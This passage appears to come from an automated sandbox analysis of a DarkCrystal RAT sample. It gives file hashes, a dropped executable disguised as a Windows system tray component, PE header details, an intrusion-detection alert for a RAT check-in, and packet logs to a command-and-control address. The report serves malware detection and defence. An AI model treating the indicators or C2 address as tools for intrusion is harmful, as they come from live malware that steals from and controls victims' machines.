                                                                                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                                                                                                          C:\Windows\System32\SecurityHealthSystray.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4608
                                                                                                                          Entropy (8bit):3.950224059798083
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:6SJbPtPaM7Jt8Bs3FJsdcV4MKe27FdravqBH+OulajfqXSfbNtm:pPpHPc+Vx9MDavkYcjRzNt
                                                                                                                          MD5:70BADD772B1B395B06D18EA91575E880
                                                                                                                          SHA1:CE8CF563C9051EA7A7588CC68E328FA8C46A53CD
                                                                                                                          SHA-256:D2E52C098D3D1C6C3B253B80AC7D1FB6D192F6D1253CF0A6A363CFDA4B1F9AEF
                                                                                                                          SHA-512:5B1674D37AD9C8BAEFCE66BA797B8D9B9068EAC6E1B56C85521E05A3C25A1F5D067D858281026E50724D018C65E88F2387A19740A3292316D92FC1CA9694488F
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#.mg.............................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..4.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                                                          \Device\Null

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\w32tm.exe
                                                                                                                          File Type:ASCII text
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):151
                                                                                                                          Entropy (8bit):4.834545583300813
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:VLV993J+miJWEoJ8FXlapSfffRXXKvodpy6vj:Vx993DEUanV+8
                                                                                                                          MD5:ECABC38F1B4DDB2614360E920C7E6F93
                                                                                                                          SHA1:D04A9D5D1FC045BF806368CE38A698D526C40F15
                                                                                                                          SHA-256:714D4E228A4ED5084F3F1BA0F6AE9E12BA0676A762BC7A383A912C0DF3B91C34
                                                                                                                          SHA-512:819D479D1520941D086AEA1B02E9A121BC24682980FD3F5C6C3C717599BCBD091A34E51B6B894465DD91CD2DE3F5DDF5E3F95E7F1496DAA10CDC85EBA8E81E8C
                                                                                                                          Malicious:false
                                                                                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 26/12/2024 18:17:58..18:17:58, error: 0x80072746.18:18:03, error: 0x80072746.

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                          Entropy (8bit):7.8177703231829705
                                                                                                                          TrID:
                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                          File name:r6cRyCpdfS.exe
                                                                                                                          File size:3'615'744 bytes
                                                                                                                          MD5:6310493f1eae60f8f1375eb05341a7d7
                                                                                                                          SHA1:8b0d6e459d66346e8dba5a0d857b4b192871d437
                                                                                                                          SHA256:08e4f00e67200c00552466fc1179a23d17f4c7497afe89c4d5d4b6d8878216f4
                                                                                                                          SHA512:e7adb1a4d6b91740bd537197a944b5254a161d955669d7e26caa51dabdf9610ddf16bb41b8d179f15c2d5b19c0152e248620f9cb6ebae31c480210288859e4b6
                                                                                                                          SSDEEP:98304:E9aZyoEkZuJGFNIC0+6TJC9f3ZRUn4nb50Rf:E9UDE+TIClUgvnE4b5u
                                                                                                                          TLSH:34F5E0166A924E37C760573582974A3D5395C7763922FB2B365F20D2AC077F08EB22F2
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....gg.................$7..........B7.. ...`7...@.. ........................7...........@................................

                                                                                                                          File Icon

                                                                                                                          Icon Hash:90cececece8e8eb0

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x77421e
                                                                                                                          Entrypoint Section:.text
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0x6767C2AE [Sun Dec 22 07:41:34 2024 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax], al

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x3741d00x4b.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x3760000x320.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x3780000xc.reloc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x20000x3722240x37240084b9f30032acf8816adad1f4631ae41eunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0x3760000x3200x400578f51af6e06f9d7186c44c6c17e0d30False0.3515625data2.6496837750241067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                          .reloc0x3780000xc0x200f8ef380481c435641f1fcb85d5fa5efdFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_VERSION0x3760580x2c8data0.46207865168539325

                                                                                                                          Imports

                                                                                                                          DLLImport
                                                                                                                          mscoree.dll_CorExeMain

                                                                                                                          Network Behavior

                                                                                                                          Suricata IDS Alerts

                                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                          2024-12-26T22:32:17.680237+01002048095ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)1192.168.2.44973137.44.238.25080TCP

                                                                                                                          Network Port Distribution

                                                                                                                          TCP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Dec 26, 2024 22:32:16.114097118 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:16.234076977 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:16.237627983 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:16.238518000 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:16.358007908 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:16.586913109 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:16.706645966 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:17.600750923 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:17.680147886 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:17.680169106 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:17.680237055 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:17.766592026 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:17.849556923 CET4973380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:17.886676073 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:17.969151020 CET804973337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:17.969309092 CET4973380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:17.969432116 CET4973380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:18.088982105 CET804973337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:18.117593050 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:18.192038059 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:18.237241030 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:18.289336920 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:18.321199894 CET4973380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:18.440854073 CET804973337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:18.440876007 CET804973337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:18.440891027 CET804973337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:18.618942022 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:18.701118946 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:19.055107117 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:19.089050055 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:19.206849098 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:19.206897020 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:19.206907034 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:19.206954002 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:19.207056999 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:19.208523989 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:19.352791071 CET804973337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:19.422435045 CET4973380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:19.512425900 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:19.586226940 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:19.603705883 CET804973337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:19.708818913 CET4973380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:19.722728014 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:19.865777969 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:20.139914036 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:20.259560108 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:20.494832993 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:20.565212011 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:20.614537001 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:20.614556074 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:20.614610910 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:20.644309998 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.083962917 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:21.156984091 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.318245888 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.319824934 CET4973680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.393008947 CET4973380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.438225985 CET804973137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:21.438287973 CET4973180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.439409018 CET804973637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:21.439485073 CET4973680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.439671040 CET4973680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.513560057 CET804973337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:21.513638020 CET4973380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.559076071 CET804973637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:21.789572954 CET4973680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:21.909315109 CET804973637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:21.909329891 CET804973637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:21.909341097 CET804973637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:22.803172112 CET804973637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:22.870183945 CET4973680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:23.059711933 CET804973637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:23.180018902 CET4973680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:24.167934895 CET4974180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:24.287805080 CET804974137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:24.287914991 CET4974180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:24.288054943 CET4974180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:24.407538891 CET804974137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:24.633269072 CET4974180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:24.753056049 CET804974137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:24.753073931 CET804974137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:24.753118038 CET804974137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:24.759305000 CET4974280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:24.879081964 CET804974237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:24.879210949 CET4974280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:24.879385948 CET4974280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:24.998905897 CET804974237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:25.064385891 CET4974180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:25.225419998 CET804974137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:25.227118969 CET4974280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:25.345340967 CET804974137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:25.345427036 CET4974180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:25.346716881 CET804974237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:25.372133970 CET804974237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:25.467474937 CET4973680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:25.583698034 CET4974380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:25.703429937 CET804974337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:25.703528881 CET4974380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:25.703663111 CET4974380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:25.823120117 CET804974337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:26.242075920 CET804974237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:26.383100033 CET4974280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:26.499861002 CET804974237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:26.523304939 CET4974380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:26.642963886 CET804974337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:26.642995119 CET804974337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:26.643034935 CET804974337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:26.679965973 CET4974280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:27.065651894 CET804974337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:27.133093119 CET4974380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:27.319859982 CET804974337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:27.523721933 CET4974380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:31.508656025 CET4974280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:31.509156942 CET4974380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:31.509483099 CET4974680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:31.628704071 CET804974237.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:31.628760099 CET4974280192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:31.629048109 CET804974637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:31.629066944 CET804974337.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:31.629117012 CET4974680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:31.629152060 CET4974380192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:32.349384069 CET4974680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:32.404500008 CET4974780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:32.469250917 CET804974637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:32.524043083 CET804974737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:32.524794102 CET4974780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:32.574363947 CET4974780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:32.626533985 CET4974680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:32.693931103 CET804974737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:32.746547937 CET804974637.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:32.746602058 CET4974680192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:32.930226088 CET4974780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:33.049817085 CET804974737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:33.049837112 CET804974737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:33.049858093 CET804974737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:33.890842915 CET804974737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:34.133111954 CET4974780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:34.144341946 CET804974737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:34.320605993 CET4974780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:35.597248077 CET4974780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:35.598495007 CET4974980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:35.717936039 CET804974737.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:35.717998981 CET4974780192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:35.718801022 CET804974937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:35.718878984 CET4974980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:35.719075918 CET4974980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:35.838531971 CET804974937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:36.070785999 CET4974980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:36.190813065 CET804974937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:36.190826893 CET804974937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:36.190835953 CET804974937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:37.081674099 CET804974937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:37.133132935 CET4974980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:37.335892916 CET804974937.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:37.429995060 CET4974980192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:37.649189949 CET4975080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:37.768913984 CET804975037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:37.770888090 CET4975080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:37.772131920 CET4975080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:38.047796965 CET804975037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:38.107472897 CET4975180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:38.108040094 CET4975080192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:38.227334023 CET804975137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:38.227436066 CET4975180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:38.227785110 CET4975180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:38.269404888 CET804975037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:38.347682953 CET804975137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:38.586309910 CET4975180192.168.2.437.44.238.250
                                                                                                                          Dec 26, 2024 22:32:38.705987930 CET804975137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:38.706007957 CET804975137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:38.706073046 CET804975137.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:38.985788107 CET804975037.44.238.250192.168.2.4
                                                                                                                          Dec 26, 2024 22:32:38.985863924 CET4975080192.168.2.437.44.238.250
